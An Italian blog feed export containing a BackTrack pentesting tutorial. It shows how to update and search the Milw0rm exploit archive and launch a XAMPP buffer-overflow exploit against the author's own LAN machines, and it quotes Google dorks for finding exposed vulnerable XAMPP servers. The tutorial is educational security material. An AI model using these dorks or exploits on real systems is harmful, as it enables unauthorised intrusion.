<p style="text-align:left;">È da dire con estrema sensibilità che Tor va usato con la massima attenzione , nel senso che Tor anonimizza il nostro traffico , ma non può anonimizzare ad esempio le informazioni che possono attraversare plugin come i classici <em>Java</em> , <em>Flash</em> , i controlli <em>ActiveX</em> , il plugin <em>Realplayer</em> e via dicendo&#8230;   &#8230;è consiglitato per questi fattori avere 2 browser aperti nello stesso momento , avere quindi un browser per la connessione sicura con Tor abilitato e uno per le normali connessioni , oppure se si vuole usare sempre e comunque Tor bisognerebbe disabilitare i plugin che ci mettono in condizioni di rischio.</p>
<p style="text-align:left;"><em>Per queste ed altre indicazioni è consigliato leggere <span style="text-decoration:underline;">molto</span> attentamente la pagina degli <a href="http://www.torproject.org/download.html.en#Warning"><strong>WARNING&#8217;S</strong></a> del progetto <strong>Tor</strong>.</em></p>
<p style="text-align:left;">Non è la prima volta che uso Tor , ma la prima volta che uso Tork sì e devo dire che l&#8217; ho trovato como e veloce per questo secondo me adattabile facilmente ad una live come<strong> BackTrack</strong> , basti pensare che essendo appunto una distro live , sono pochi coloro che vogliono avvalersi di programmi per la gestione di posta elettronica come ad esempio mozilla-thunderbird o kmail , con Tork possono inviare mail anonime con estrema facilità , questa la semplice interfaccia grafica&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">
<p style="text-align:center;"><a href="http://www.postimage.org/image.php?v=Pq1epZo0" target="_blank"><img class="aligncenter" src="http://www.postimage.org/Pq1epZo0.jpg" border="0" alt="" width="325" height="311" /></a></p>
<p style="text-align:center;">***</p>
<p style="text-align:left;">Una volta abituati , bene , all&#8217; uso di <strong>Tor</strong> , si può benissimo prendere in considerazione l&#8217; idea di rendersi perennemente <strong>nodo</strong> del progetto , per la crescita della privacy e delle libertà collettive , oggi semprepiù a rischio.</p>
<p style="text-align:left;">Alla prossima.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/558/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/558/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/558/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/558/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/558/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/558/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/558/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/558/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/558/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/558/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/558/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/558/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=558&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/09/09/tork-anonimato-in-backtrack/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/anonym.png" medium="image">
			<media:title type="html">anonym</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/top-left.png" medium="image">
			<media:title type="html">top-left</media:title>
		</media:content>

		<media:content url="http://img178.imageshack.us/img178/8416/weweqj6.th.png" medium="image">
			<media:title type="html">Free Image Hosting at www.ImageShack.us</media:title>
		</media:content>

		<media:content url="http://img84.imageshack.us/img84/2875/wewe2og9.th.png" medium="image">
			<media:title type="html">Free Image Hosting at www.ImageShack.us</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/torklogo.png" medium="image">
			<media:title type="html">torklogo</media:title>
		</media:content>

		<media:content url="http://www.postimage.org/aV17xmG0.jpg" medium="image" />

		<media:content url="http://www.postimage.org/Pq17_viA.jpg" medium="image" />

		<media:content url="http://www.postimage.org/aV17yFZJ.jpg" medium="image" />

		<media:content url="http://www.postimage.org/Pq1epZo0.jpg" medium="image" />
	</item>
		<item>
		<title>BackTrack &amp; Milw0rm Exploits Archive [+video]</title>
		<link>http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 02:23:34 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/General]]></category>
		<category><![CDATA[/Penetration]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=517</guid>
		<description><![CDATA[
***
Ciao a tutti,
eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più  interessanti.
Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra BackTrack per fare un pentesting tramite l&#8217; uso dell&#8217; archivio degli exploits di [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=517&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p align="center"><a title="milw0rm_cracker.jpg" rel="attachment wp-att-315" href="http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/attachment/315/"><img src="http://carlitobrigante.files.wordpress.com/2008/02/milw0rm_cracker.jpg?w=447&#038;h=89" alt="milw0rm_cracker.jpg" width="447" height="89" /></a></p>
<p align="center">***</p>
<p>Ciao a tutti,</p>
<p>eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più  interessanti.</p>
<p>Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra <span style="text-decoration:underline;"><strong>BackTrack</strong></span> per fare un pentesting tramite l&#8217; uso dell&#8217; archivio degli exploits di <strong>milw0rm.com</strong>.</p>
<p>Per eseguire il nostro pentesting ci serviremo di:</p>
<ul>
<li><em>L&#8217; <strong>Archivio </strong>degli <strong>Exploits</strong> di </em><span style="text-decoration:underline;"><strong>Milw0rm</strong></span><span style="text-decoration:underline;">.</span></li>
<li><em><strong>nMap</strong> , per la scansione con opzioni per il <span style="text-decoration:underline;">fingerprinting</span>.<br />
</em></li>
<li><em><strong>Dsniff</strong> , esclusivamente per lo sniffing delle credenziali<span style="text-decoration:underline;"> da localhost.</span></em></li>
</ul>
<p style="text-align:center;"><strong>***</strong></p>
<p><em>Ci tengo a dire che in questo tutorial non è stato fatto danno ad alcuno , <strong>tutti si svolge nella mia LAN </strong>. Ho provato a chiedere l&#8217; autorizzazione a vari sysadmin , ma dopo aver upgradado le loro cosette non mi hanno nemmeno risposto&#8230; &#8230;.<strong>0</strong> su <strong>9</strong>.</em></p>
<p><em>Altra cosa importrante che mi sento di aggiungere è di <span style="text-decoration:underline;">ringraziare: <strong>KaB0T</strong> per la disponibilità ed  <strong>EikaF</strong></span> , senza il quale avremmo fatto un altro video lento ed incasinato , anche se da questo punto di vista dobbiamo ancora migliorare credo che si veda la differenza &#8220;in meglio&#8221; nei confronti dei video precedenti.</em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><em>tutto il tutorial è referente interamente al video che abbiamo fatto , dal nome </em></p>
<p style="text-align:center;"><em><span style="text-decoration:underline;"><strong>&#8220;BackTrack &amp; Milw0rm Exploits Archive&#8221;</strong></span> , naturalmente presente nella pagina <a href="http://carlitobrigante.wordpress.com/video/"><strong>/video</strong></a>.</em></p>
<p style="text-align:center;"><em>è stato girato interamente con <strong>Fluxbox</strong> , ma le sezioni che io uso per Fluxbox sono identiche a quelle impostate di default in <strong>BackTrack</strong> per<strong> KDE</strong> , quindi non cambia nulla&#8230;</em></p>
<p style="text-align:center;"><em>&#8230;Il video è scaricabile da<a href="http://www.mediafire.com/?1dsx2e9vxxy" target="_blank"><strong><span style="text-decoration:underline;"> Quì</span></strong></a>.</em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Innanzitutto voglio fare delle piccole precisazioni:</p>
<p>Il pc nella mia LAN ha un multiboot con: WinServer-2003.spk2<em>-(FamilyConnection-CMS)-</em> , WinServer-2000.spk3<em>-(-XAMPP)-</em> , Windows Xp spk2<em>-(BadBlue-WebServerFileSharing)-</em>.</p>
<p>Sono stati usati in tutto 3 exploits , per altrettante demo nel video.</p>
<p><span style="text-decoration:underline;">Uno degli exploits </span>è un exploit scritto da <a href="http://carlitobrigante.wordpress.com/2008/04/27/il-nostro-addio-a-retrogod/"><strong>rGod</strong></a> e diretto verso uno<strong> Xampp</strong>&#8230; , <em>(-nel video ultima demo-)</em> ,  &#8230;cos&#8217;é uno Xampp?</p>
<p>lo Xampp è un &#8220;aggregato&#8221; di webserver e database , con tanto di interprete PHP , in pratica con lo xampp ho instalato sul sistema , poi preso come &#8220;vittima&#8221; , il webserver Apache , il database MySql e l&#8217;interprete PHP , per saperne di più potete darvi una leggerissima letta alla nostra pagina <a href="http://carlitobrigante.wordpress.com/inf0-it/" target="_blank"><strong>/Inf0-[IT]</strong></a></p>
<p><span style="text-decoration:underline;">Un altro </span>exploit , <em>(-nel video seconda demo-)</em> , (scritto dal<em> <a href="http://citec.us/" target="_blank">CWH</a> Underground Hacking Team) </em>, invece è diretto contro un CMS , il <strong>FamilyConnection CMS</strong> , una piattaforma tipo WordPress , solo che viene usata molto fra community.</p>
<p><span style="text-decoration:underline;">L&#8217; altro</span> exploit , <em>(-nel video prima demo-)</em> , (scritto da<a href="http://www.milw0rm.com/author/709" target="_blank"> </a><em><a href="http://www.milw0rm.com/author/709" target="_blank">J.Cervini</a> su un Bug scoperto da <a href="http://luigi.eliott-ness.com/" target="_blank">L.Auriemma</a>) </em>, è diretto invece verso un webserver , il <strong>BadBlue</strong>. Il BadBlue è un semplice webserver utilizzato per il filesharing tra conoscenti , installandosi sul proprio sistema il BadBlue si possono in pratica condividere files di tutti i tipi.</p>
<p>tutti questi exploits utilizzati sono naturalmente corrispondenti ad una specifica versione dei corrispettivi server , CMS , applicazioni eccetera&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ma facciamo una breve descrizione di cio che stiamo per fare&#8230;</p>
<p>Il team di <strong><a href="http://www.remote-exploit.org/about.html">remote-exploit.org</a> </strong>, ha pensato bene di inserie un tool da riga di comando che permetta a tutti gli user di <strong>BackTrack</strong> di avere a disposizione ,<em> (anche OFF-Line)</em> , un archivio di exploits per effettuare , in ogni situazione , un pentesting con il massimo grado di efficacia e lo ha fatto inserendo in <strong>BackTrack</strong> l&#8217; archivio exploits di <strong>Milw0rm</strong>.</p>
<p><strong><a href="http://carlitobrigante.wordpress.com">Milw0rm</a> </strong>è un sito che raccoglie centinaia di <a href="http://carlitobrigante.wordpress.com/whitepaper-2/"><strong>Exploit</strong></a><a href="http://carlitobrigante.wordpress.com/whitepaper-2/"> &amp; <strong>Shellcodes</strong></a> ,  scritti in vari tipi di linguaggi di programmazione e per tutti i tipi di piattaforme ed applicazioni , web e non.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[installazione Archivio per la BackTrack3.final]</strong></span></p>
<p>Fino alla versione <strong>3.beta</strong> della BackTrack un archivio degli exploits di milw0rm era inserito da installazione , dalla <strong>3.final</strong> no , ma basta installarselo tramite  <span style="text-decoration:underline;"><strong>Fast-Track</strong> </span>, (tool multifunzione di cui scriveremo a breve&#8230;), quindi:</p>
<p><strong><em>KdeStartMenù</em> </strong>&#8211;&gt; <em><strong>BackTrack</strong></em> &#8211;&gt; <em><strong>Penetration</strong></em> &#8211;&gt; <strong>Fast-Track</strong> ,</p>
<p>dal menù principale di <span style="text-decoration:underline;"><em>Fast-Track</em></span> scegliete la modalità &#8220;<strong>interactive</strong>&#8220;:</p>
<p><strong><span style="color:#ff0000;">bt~</span><span style="color:#0000ff;"># </span></strong><strong>./fast-track.py -i</strong></p>
<p>In questo modo otterrete un altro menù , scegliete l&#8217; opzione <strong>1</strong> , quindi la <strong>4</strong> e vi si installerà l&#8217; archivio <strong>milw0rm</strong>. con lo script per l&#8217; <strong>UPdate</strong>.</p>
<p style="text-align:center;">***</p>
<p><span style="color:#ff0000;"> Fast-Track Updates</span></p>
<p><span style="color:#ff0000;">Enter a number to update</span></p>
<p><span style="color:#ff0000;">1. Update Fast-Track<br />
2. Metasploit 3 Update<br />
3. Aircrack-NG Update<br />
4. Milw0rm Update<br />
5. Nikto Plugin Update<br />
6. W3AF Update<br />
7. SQLMap Update<br />
8. Installation Menu<br />
9. Update Everything<br />
10. Return to Main Menu</span></p>
<p><span style="color:#ff0000;">Enter number:</span></p>
<p style="text-align:center;">***</p>
<p>Oltre a <strong>Milw0rm</strong> ci sono molti altri siti che raccolgono , ed hanno un proprio archivio di exploits e di shellcodes , ma visto che tratteremo l&#8217; uso di un archivio già presente in <strong>BackTrack</strong> , ( o almeno installabile &#8211; per la 3.final ) , descriveremo ed effettueremo un pentesting con l&#8217; archivio di <strong>Milw0rm</strong>.</p>
<p>È possibile trovare sul sito Milw0rm materiale quali:  <strong>documenti</strong> , <strong>videotutorial</strong> , <strong>withepaper</strong> , il <a href="http://www.milw0rm.com/cracker/insert.php"><em><strong>password cracker</strong></em></a> , un <a href="http://www.milw0rm.com/mil-dic.php">dizionario</a> , ed è possibile inoltre ottenere tramite download lo stesso <em><span style="text-decoration:underline;"><strong><a href="http://www.milw0rm.com/sploits/milw0rm.tar.bz2">archivio degli exploits.</a></strong> </span></em></p>
<p>Una piccola , ma molto comoda , utility che Milw0rm offre è l&#8217; estensione per <strong>Firefox</strong> che abilita la ricerca sullo stesso sito , volendo l&#8217; opzione è disponibile <a href="http://wired.s6n.com/files/jathias/milw0rm_search.htm"><span style="text-decoration:underline;"><em><strong>quì</strong></em></span></a>.</p>
<p><strong>Milw0rm</strong> è un sito che , insieme ad altri quali , solo per fare un esempio , <a href="http://securityreason.com/"><strong>SecurityReason</strong></a> &#8211; <strong><a href="http://www.securityfocus.com/">Security Focus</a> </strong>,<a href="http://packetstorm.offensive-security.com/"><strong> Packet Storm</strong></a> , <a href="http://www.vulnerabilityassessment.co.uk/"><strong>Vulnerability Assestament</strong></a> , <span style="text-decoration:underline;"><a href="http://www.securiteam.com/exploits/"><strong>Securiteam</strong></a></span> &#8230;eccetera , ottiene nuovi exploits in maniera abbastanza &#8220;<em><span style="text-decoration:underline;">lesta</span></em>&#8221; , tutti gli amministratori di sistemi traggono importanti informazioni da milw0rm , personalmente non credo che chiunque voglia essere al passo con la scoperta di nuove vulnerabilità possa fare a meno di passare per un sito come Milw0rm.</p>
<p><em><strong>N</strong>on posso però evitare di dire che non tutte le vulnerabilità vengono rilevate ; che non tutte quelle rilevate vengono rivelate e che non si può essere <strong><span style="text-decoration:underline;">MAI</span></strong> certi al 100% di conoscere tutte le vulnerabilità , è una cosa impossibile , ma tenersi aggiornati periodicamente è una cosa fondamentale , farlo tramite un sito di exploit pubblici come quelli che vi ho appena elencato è sicuramente un ottimo inizio.</em></p>
<p>Gli exploit che non sono ancora stati rivelati , che prendono il nome di 0day , sono quelli che possono causare più problemi di tutti , visto che la loro effettiva funzione viene scoperta a danno già fatto.</p>
<p>Va detto comunque che ci sono anche <strong>0day</strong> che vengono rivelati direttamente dai siti che vi ho citato sopra , ma questa è una cosa che dipende da coloro che li rendono pubblici.</p>
<p>Fatte queste dovute premesse credo sia giusto scrivere qualcosa anche a riguardo degli exploits , almeno per rendere l&#8217; idea a tutti di quello che stiamo facendo.</p>
<p>Un exploit è un programma , script , che permette di sfruttare delle vulnerabilità insite in applicazioni , programmi di varia natura e funzione , database o anche una semplice pagina web e che ci permette di poter eseguire sul sistema preso come obbiettivo dell&#8217; attacco , del codice &#8220;maligno&#8221; , dannoso , cosa che normalmente non è possibile fare. L&#8217; exploit , inteso come programma , o script , può rappresentare anche una stringa unica , come ad esempio nel caso dell&#8217; <strong>Sql-Injection</strong> , basta andare su Milw0rm per rendersene conto.</p>
<p>Un <strong>exploit</strong> può essere scritto in vari tipi di linguaggii di programmazione , dal <strong>C</strong> al <strong>python</strong> , dal <strong>Php</strong> al<strong> Perl </strong>e così via&#8230;   &#8230;e molte volte necessitano di compilazione.</p>
<p>Di seguito elencherò alcuni tipi di attacco , ma lo farò seguendo il metodo che ci interessa in questo tutorial , quindi secondo la suddivisione dell&#8217; archivio degli exploits di milw0rm in rete , sullo stesso sito milw0rm , oppure secondo l&#8217; archivio in <strong>BackTrack</strong>.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[UPdate Milw0rm Archive]</strong></span></p>
<p>Facciamo , come bisognerebbe fare ogni qualvolta si intende eseguire un test di penetrazione tramite degli exploits , un <strong>UPdate</strong> dell&#8217; <strong>archivio</strong> degli <strong>Exploits</strong> di <strong>Milw0rm</strong> , andiamo quindi in:</p>
<p><em><strong>KdeStart</strong> &#8211;&gt;<strong> BackTrack -</strong>-&gt; <strong>Penetration -</strong>-&gt; <strong>Milw0rmExploitArchive</strong>-&gt;</em><strong> &#8220;&#8230;&#8221; </strong>, e da quì selezioniamo:<strong> &#8220;<span style="text-decoration:underline;">Update Milw0rm Archive</span>&#8221; </strong>, in questo modo ci si aprirà una shell che automaticamente effettuerà l&#8217; UPdate , otteniamo così tutto l&#8217; archivio aggiornato degli exploits da milw0rm.com.</p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[Ricerca</strong><strong> exploits]</strong></span></p>
<p style="text-align:center;">Gli exploits che abbiamo ottenuto tramite il nostro <strong>UPdate</strong> si trovano nella seguente directory:</p>
<p><strong>/pentest/exploits/milw0rm/ &#8220;&#8230;&#8230;&#8230;&#8221;</strong></p>
<p>Ora , appena terminata la procedura di UPdate , andiamo nella directory indicata sopra direttamente da <strong>Konsole</strong> , con <strong>xTerm</strong> oppure con <strong>Konqueror</strong> ,  da quì possiamo vedere che nella directory <strong>~/Milw0rm/</strong> sono contenute altre subdirectory , ognuna identifica una serie di exploits equivalenti a determinati tipi di piattaforme   &#8230;<strong>platforms</strong> , o porte &#8230;<strong>rport.</strong></p>
<p>Dalle subdirectory in <strong>~/platforms/&#8230;</strong> <strong>windows</strong> , <strong>unix</strong> <strong>, solaris</strong> &#8230;eccetera si dividono poi in attacchi da <strong>remote</strong> o <strong>local.</strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="text-decoration:underline;"><strong>Grazie</strong></span> ad una novità di <strong>./str0ke</strong> , (admin di <strong>milw0rm.com</strong>) , che ha creato una lista di exploits appositamente per <strong>BackTrack</strong> , (dal nome appunto <strong><em><span style="text-decoration:underline;">&#8220;sploitlist-bt.txt</span></em>&#8221; </strong>) , il metodo di ricerca per gli exploits che si trovano all&#8217; interno dell&#8217; archivio <strong>Milw0rm</strong> in <strong>BackTrack</strong> , si esegue  tramite il comando <a href="http://www.linux.it/~giammy/unix_linux_introduction/html/img51.html"><strong>grep</strong></a> , sempre da shell e naturalmente all&#8217; interno della directory che contiene le liste di exploits in formato <strong>*.txt</strong> , una dal nome <strong><span style="text-decoration:underline;">sploitlist.txt</span></strong> e l&#8217; altro <span style="text-decoration:underline;"><strong>sploitlist-bt.txt</strong></span></p>
<p>In questo modo , se ci serve ad esempio un exploit per il <strong>Vista </strong> , ci basterà dare il comando:</p>
<p><strong><span style="color:#ff0000;">bt~</span><span style="color:#0000ff;">#</span> grep Vista sploitlist-bt.txt </strong></p>
<p>e ci verranno restituite le subdirectory con gli exploits disponibili.</p>
<p>Per fare un semplice esempio , nel nostro caso , trattandosi per quanto riguarda il pentesting contro il sistema con Windows XP.professional , del webserver <strong>BadBlue</strong> andrò dapprima nella directory corretta e poi cercherò con il comando grep gli exploits disponibili , nel modo seguente:</p>
<p><strong><span style="color:#ff0000;">bt<span style="color:#0000ff;"> ~</span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span><span style="color:#000000;"> cd /pentest/exploits/milw0rm/<br />
</span></span></strong></p>
<p><strong><span style="color:#ff0000;">bt<span style="color:#0000ff;"> milw0rm </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span><span style="color:#000000;"> grep BadBlue sploitlist-bt.txt</span></span></strong></p>
<p><em><span style="text-decoration:underline;">..ed ecco il risultato ottenuto.</span></em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="color:#ff0000;">./platforms/windows/remote/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow<br />
./platforms/windows/remote/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow<br />
./platforms/windows/remote/4715.txt BadBlue &lt;= 2.72b Multiple Remote Vulnerabilities<br />
./platforms/windows/remote/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit<br />
./rport/80/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow<br />
./rport/80/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow<br />
./rport/80/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit</span><strong><span style="color:#ff0000;"><br />
</span></strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>[Attacco con Exploits]</strong></span></p>
<p>Arrivati ai vari tipi di attacco facciamone , come è giusto , una brevissima descrizione fatta secondo le principali sigle su milw0rm , ovvero: <strong>DoS-PoC</strong> , <strong>Web-App</strong> , <strong>Shellcode</strong> ,  <strong>Local</strong> e <strong>Remote</strong></p>
<p style="text-align:left;"><span style="text-decoration:underline;"><em>[Attacco <strong>DoS</strong> e <strong>DDoS</strong>]:</em></span></p>
<p>La sigla <span style="text-decoration:underline;"><strong>DoS</strong></span> sta a significare<strong> Denial of Service</strong> , e la sigla <span style="text-decoration:underline;"><strong>DDos</strong></span> sta invece per <strong>Distribuite-Denial of Service</strong>.</p>
<p>Come dicono le stesse sigle , il successo di questo tipo di attacco sta nel <em>diniego</em> del servizio , distribuito nel secondo caso , (DDoS) , singolo nel primo.</p>
<p>Queste parole in stile &#8220;<em>traduzione</em>&#8221; , dovrebbero rendere già l&#8217;idea del significato di un attacco DoS oppure DDoS , il suo funzionamento sta nel far arrivare al sistema vittima un attacco , o un insieme di attacchi , che rendono inaccessibile il sistema ; ma come può avvenire ciò?</p>
<p>La risposta è facile: un sito , che si raggiunge con una connessione ad internet , può esserci negato quando ad esempio siamo senza banda , senza linea praticamente , e saturare la banda a disposizione del sistema potrebbe essere quindi già un metodo per effetuare un DoS. Un attacco alla banda di un sistema potrebbe avvenire ad esempio tramite un eccessivo numero di richieste di accesso , ed il sistema , se non preparato , non potrà che andare fuori uso.</p>
<p><em>È ancora oggi famoso ciò che accadde nel<a href="http://openskills.info/topic.php?ID=158"> Febraio del 2000</a> , quando al sistema di </em><em><strong>Yahoo!</strong> venne sferrato un attacco di tipo DDoS , e rimase inaccessibile per delle ore. L&#8217; attacco sferrato partì da centinaia di host in giro per la rete che a sua volta furono violati precedentemente.(<span style="text-decoration:underline;">&#8230;Tahnx! to <strong><a href="http://www.openskills.org/">OpenSkills</a></strong></span>)</em></p>
<p>Il sistema di attacco DoS non è compromettente , è facile capire che se viene effettuato un DoS tramite la saturazione di una banda , una volta che la stessa tornerà attiva i problemi svaniranno&#8230;. &#8230;.almeno fino al prossimo attacco (!?), ma non è comunque una cosa che compromette il sistema.</p>
<p><em><span style="text-decoration:underline;">[La sigla <strong>PoC</strong>]:</span></em></p>
<p>La sigla PoC sta a significare &#8220;<strong>Proof of concept</strong>&#8221; , abbozzo o progetto da terminare , inserita con lo scopo di dimostrare la fondatezza di un determinato progetto. Negli elenchi degli exploits sul sito milw0rm.com , la sigla PoC viene riportata quando coloro che scoprono il bug e ne scrivono successivamente l&#8217; exploit corrispondente , mostrano con delle spiegazioni l&#8217; eseguibilità del loro lavoro.</p>
<p>breve esempio:</p>
<p>nell&#8217; ultima demo del videotutorial si esegue un attacco verso uno Xampp , l&#8217; exploit come già detto scritto da rGod , contiene commentata una serie di stringhe che ne spiegano l&#8217; efficacia , questo il contenuto del <strong>PoC</strong> nell&#8217; exploit <strong>./3738.php</strong> di<strong> rGod</strong>&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<pre><span style="color:#ff0000;">mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .

If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:

intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows

note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have  magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/</span></pre>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><span style="text-decoration:underline;"><em>[Attacco in <strong>local</strong>] :</em></span></p>
<p>L&#8217; attacco in local è quell&#8217; attacco che si svolge all&#8217; interno di una rete indipendende , anche se non del tutto , o si ha già comunque un certo accesso alla rete stessa. Un esempio può essere quello di fare dello sniffing nella propria LAN oppure acquisire i privilegi di amministratore del sistema da utente semplice. Un esempio di sniffing può essere quello che ho descritto nell&#8217; esempio fatto con<a href="http://carlitobrigante.wordpress.com/?s=ettercap"> <strong>Ettercap</strong></a> e che dimostra appunto come poter fare<span style="text-decoration:underline;"> &#8220;sniffing&#8221; di username e password all&#8217; interno di una LAN</span>.</p>
<p>Gli attacchi in local sono però di varia natura , anche se la maggiorparte , vista la questione di permessi , sono effettuati su sistemi M$Windows , ce ne sono anche molti per sistemi UNIX-based , l&#8217; exploit n° <a href="http://www.milw0rm.com/exploits/5092"><span style="text-decoration:underline;"><strong>5052</strong></span></a> ,<em>(quando parlo di numeri , mi rivolgo al numero occupato dall&#8217; exploit all&#8217; interno dell&#8217; archivio <span style="text-decoration:underline;">milw0rm</span>)</em>, infatti è proprio propenso al <strong>local root exploitation</strong> su sistemi <strong>GNU/Linux.</strong></p>
<p style="text-align:left;"><em><span style="text-decoration:underline;">[Attacco in <strong>remoto</strong>]: </span></em></p>
<p>L&#8217;attacco in remoto è quella tipologia di attacco che si effettua da una postazione totalmente estranea all&#8217; obbiettivo , che si trova quindi su di un altro dominio , e di cui non si ha nessun permesso d&#8217; accesso.</p>
<p>È logico capire che ogni tipo di attacco può o no essere fine a se stesso , oppure può essere utilizzato in concomitanza con altre tipologie di attacco.</p>
<p align="center"><strong>***</strong></p>
<p align="center"><em>In questo caso ho elencato esclusivamente alcuni tipi di attacco , solo per rendere l&#8217; idea , se si và sul sito milw0rm.com si possono trovare sigle del tipo <strong>RFI</strong> , <strong>LFI</strong> , <strong>Loca Root Exploits </strong>eccetera&#8230; , a tutte queste descrizioni sia giusto rimandarvi al <a href="http://it.wikipedia.org/wiki/Portale:Informatica"><span style="text-decoration:underline;">portale informatico</span><strong><span style="text-decoration:underline;"> </span></strong><span style="text-decoration:underline;">di </span><strong><span style="text-decoration:underline;">Wikipedia</span></strong></a></em><em>.<br />
</em></p>
<p align="center"><strong>*** </strong></p>
<p>Andiamo avanti con il tutorial , il primo pentesting , (terza demo nel video) ,  viene eseguito sullo Xampp , dalla directory esatta , come sopra eseguo da shell il comando:</p>
<p><strong><span style="color:#ff0000;">bt<span style="color:#0000ff;"> milw0rm </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span><span style="color:#000000;"> grep XAMPP sploitlist-bt.txt</span></span></strong></p>
<p><em><span style="text-decoration:underline;">ed eccone il risultato:</span></em></p>
<p><strong><span style="color:#ff0000;">./platforms/windows/remote/3738.php XAMPP for Windows &lt;= 1.6.0a mssql_connect() Remote BoF Exploit</span></strong></p>
<p><strong><span style="color:#ff0000;">./platforms/windows/local/4325.php XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit<br />
./rport/80/3738.php XAMPP for Windows &lt;= 1.6.0a mssql_connect() Remote BoF Exploit</span></strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">L&#8217; exploit che useremo è il 3738.php , e per essere eseguito basta dare un occhiata alla matrice stessa dell&#8217; explot , basta dare da shell il comando come eseguibile preceduto dall&#8217; interprete quindi:</p>
<p style="text-align:left;"><strong>php ./3738.php</strong></p>
<p style="text-align:left;">il tutto naturalmente dopo essere entrati nelle directory elencate dal comando <strong>grep.</strong></p>
<p style="text-align:left;"><strong><span style="color:#ff0000;">bt</span> </strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">milw0rm </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span></span></strong><strong> cd platforms/windows/remote/</strong></p>
<p>Con il comando appena eseguito ci verrà elencata tutta la <em>&#8220;matrice&#8221; </em>dell&#8217; exploit , chi l&#8217; ha scritto , la piattaforma , il bug e in che modo deve essere eseguito , e infatti ecco il risultato&#8230;</p>
<p align="center"><strong>*** </strong></p>
<p><strong><span style="color:#ff0000;">bt</span> <span style="color:#0000ff;">remote</span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;"> </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span></span></strong><strong> </strong><strong>php ./3738.php</strong></p>
